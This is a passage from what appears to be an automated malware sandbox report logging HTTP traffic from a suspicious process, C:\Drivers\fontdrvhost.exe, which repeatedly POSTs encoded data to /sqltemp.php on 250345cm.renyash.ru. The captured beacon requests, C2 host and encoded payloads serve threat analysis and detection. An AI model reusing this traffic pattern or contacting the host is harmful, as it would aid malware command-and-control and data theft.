                                                                                                                                                                                            Data Ascii: SS_RT]TVXVRYVXYW[YTPUXP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0<!X#1Y%-?B/\:#>#<_')!"<8%A2<9:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:16.048059940 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:16.229343891 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:16 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FXu8ZqCShlfdtlEJwnELDsZVGMZ7jz7HWwXD3sIRkH2mMMXvrGlNGi33ZCXmhrnqpthjBB9iFH4ZgLge%2FETQj2H7e%2BdAVQcmnLwPhrWHld77YWYOgkkpjfl9Ysg24V28nziqXe0H"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe9b0f210f7d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3839&min_rtt=1514&rtt_var=5217&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=72586&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            96192.168.2.449983104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:16.352289915 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:16.699131012 CET1012OUTData Raw: 53 55 5f 50 51 5f 54 57 58 56 52 59 56 50 59 57 5b 53 54 5d 55 5b 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SU_PQ_TWXVRYVPYW[ST]U[P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$)#?"$(,9%U =<<4)-4 !/*;.1<7T:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:16.804708004 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            97192.168.2.449988104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:16.924282074 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:17.277270079 CET1852OUTData Raw: 53 52 5f 5c 51 5a 54 52 58 56 52 59 56 5a 59 54 5b 5c 54 51 55 5b 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_\QZTRXVRYVZYT[\TQU[PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$/= ?%^0.4;)%R7=;(+>8#?X*;%??U.&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:53:17.378056049 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:17.640228033 CET950INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:17 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYQiLeh4ohlrOliXV7ulvY8%2B3pJBP%2FUq14fDOC5foYwdH01ltTzR1q%2Fp1Kfgmkf8Y2k0Ixj8TBp9YZHVoAsu0TpnwPTHBrDPVC2%2Bogk0zWsoFChyREJrVRkhnbMyoxJw3Fvn8wfU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fea35a26de95-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3843&min_rtt=1476&rtt_var=5287&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=71526&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 57 28 2d 0c 55 24 31 2f 05 2b 03 3f 1f 25 3e 2a 5d 29 28 2a 1a 30 10 2c 00 2a 29 01 1e 35 2f 21 5e 31 38 0e 59 20 13 09 13 33 1e 2b 59 05 1c 23 18 35 01 34 59 2a 3e 37 5d 26 3f 3d 59 24 00 3c 5f 3f 28 30 55 37 28 24 00 33 2e 3b 03 28 29 37 0c 24 02 3c 02 3a 01 3e 0e 24 10 2c 54 00 11 26 1d 24 22 34 1b 20 37 27 00 36 31 31 5f 25 42 2e 53 26 02 20 0a 34 07 32 15 31 31 27 5b 21 33 08 5a 31 15 3d 5a 23 2d 34 09 29 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a
                                                                                                                                                                                            Data Ascii: 98%W(-U$1/+?%>*])(*0,*)5/!^18Y 3+Y#54Y*>7]&?=Y$<_?(0U7($3.;()7$<:>$,T&$"4 7'611_%B.S& 4211'[!3Z1=Z#-4)>%S -H?WS
                                                                                                                                                                                            Jan 1, 2025 14:53:17.728766918 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            98192.168.2.449989104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:17.042898893 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:17.402266026 CET1012OUTData Raw: 53 57 5a 53 51 5b 54 54 58 56 52 59 56 51 59 53 5b 5a 54 58 55 58 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SWZSQ[TTXVRYVQYS[ZTXUXP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3,!Z#?!0#E,\%U7 ^+:<*([ T/[(*%$,:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:17.486720085 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:17.758821011 CET813INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:17 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rgh6eypzDDzBa8MLJQCD76qq%2BFZg%2B5fBH9z5Y3DcO0viZ%2FpIjJhMFyXh5GMUhJ6UaDCiwWy43zmelJn4rv5%2BkMATrZYvBEUJzfb3XtjVcshWOsT%2BhqPafzcUxtc%2Bs9muP1c%2Bu1fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fea40a5a422d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2576&min_rtt=1649&rtt_var=2473&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=160987&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            99192.168.2.449996104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:17.891175985 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:18.246124029 CET1012OUTData Raw: 56 5e 5a 57 51 5c 51 55 58 56 52 59 56 5e 59 56 5b 58 54 5b 55 58 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V^ZWQ\QUXVRYV^YV[XT[UXPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[$<57?';,\: [+*#)4Z7T+Z+(>&U:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:18.353971004 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:18.618941069 CET810INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:18 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvqIAh9P%2BkH4dkWBQGgIBr17q7PHp%2BAhPWsgVGdoUhlYHgmGV%2BSzv0Lv1DVIlwSJJygj8Kt134%2Bjtw3p6rI5Ti09aJQwLPLu%2BbQ9fSHXbNzHp68DC%2FEUakGljL0VUviSKwSuZSPF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fea96a7c0f6d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3209&min_rtt=1526&rtt_var=3939&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=97378&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            100192.168.2.450002104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:18.744623899 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:19.089760065 CET1012OUTData Raw: 56 52 5f 53 51 5c 54 57 58 56 52 59 56 58 59 5e 5b 5d 54 5d 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VR_SQ\TWXVRYVXY^[]T]U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[3 /Y$>,%S4-+)3*X$[#2X+(5E&U:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:19.197865009 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:19.462896109 CET813INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:19 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDrROniaIfYPLX2BmUIwqqR%2FMto325rfOXOeftB6cMyXwChwjbuiyiy9yF7AiLUI5MaFq3aZd4%2FL5o8Wtism%2FzkJ98io356f0s5yjLcW%2F3Ey%2BwiLpi4NOzEbf%2FASqe%2BDDeEClnnP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2feaeb9dc0f3a-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3069&min_rtt=1611&rtt_var=3520&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=109972&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            101192.168.2.450009104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:19.591994047 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:19.949393034 CET1012OUTData Raw: 56 51 5f 53 51 5a 51 56 58 56 52 59 56 5b 59 54 5b 5e 54 5b 55 58 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_SQZQVXVRYV[YT[^T[UXPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y',=Y7<>%-?D,91V7=(3T(=47?+>1<#W::&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:20.055293083 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:20.314991951 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:20 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aoeT7WAVTsBmiH2erAPyN8RLvCkWsUUjbXjRAsEkX0fGUkUm6gdjEqUTOd7%2BPq94fcWcKN%2FQB32lHwt%2BB0lQy58oHffCZlXurxQv3%2FH5D6mJ4IzAREySK3kz0WcvwaI9sHD9mGm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2feb4091142d7-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3532&min_rtt=1617&rtt_var=4438&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=86171&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            102192.168.2.450016104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:20.434406996 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:20.793019056 CET1012OUTData Raw: 56 5f 5a 50 54 5e 51 57 58 56 52 59 56 5d 59 57 5b 58 54 59 55 59 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V_ZPT^QWXVRYV]YW[XTYUYPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3,)4:0.?,:=#=?(*./#*(!&Y;T-&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:20.883064032 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:21.065653086 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:21 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NH%2B95DnN8jkmwQoNTz%2FMkpgSmwBzuS9TS4zzGJb30xYnvGT1b4viPYOdxZbJ1VhleI1WkmSDWXra6ChIcZfmWFE1VQexqu%2Fx2IvsfsDf4cxcC%2B72Xt0DoFdeUdYWHid%2Fd3TL2DbJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2feb939397cff-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2128&min_rtt=1881&rtt_var=1201&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=377944&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            103192.168.2.450022104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:21.181802988 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:21.527460098 CET1012OUTData Raw: 56 54 5f 52 54 5b 51 50 58 56 52 59 56 5f 59 57 5b 5c 54 5d 55 54 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VT_RT[QPXVRYV_YW[\T]UTP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[$Y) /9]%=$,9-V4><_<#S*.72'\+;>%#9:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:21.631953955 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:21.802687883 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:21 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBe0aPOiK%2BxDXVTOYwhDeUiIPghgkiDF2j7%2FE%2FUkDQHt1IaLWSejTrkBdUaIKTY%2FI52XuY0R295h2ksHX8DIe9X%2FiEVz77PNePvGPP6wWGueZ4AkvEyk7W71XjByvH8%2FY8FvioBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2febdeb9f0f97-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3271&min_rtt=1654&rtt_var=3854&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=100068&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X
                                                                                                                                                                                            Jan 1, 2025 14:53:21.889344931 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            104192.168.2.450029104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:22.011080027 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
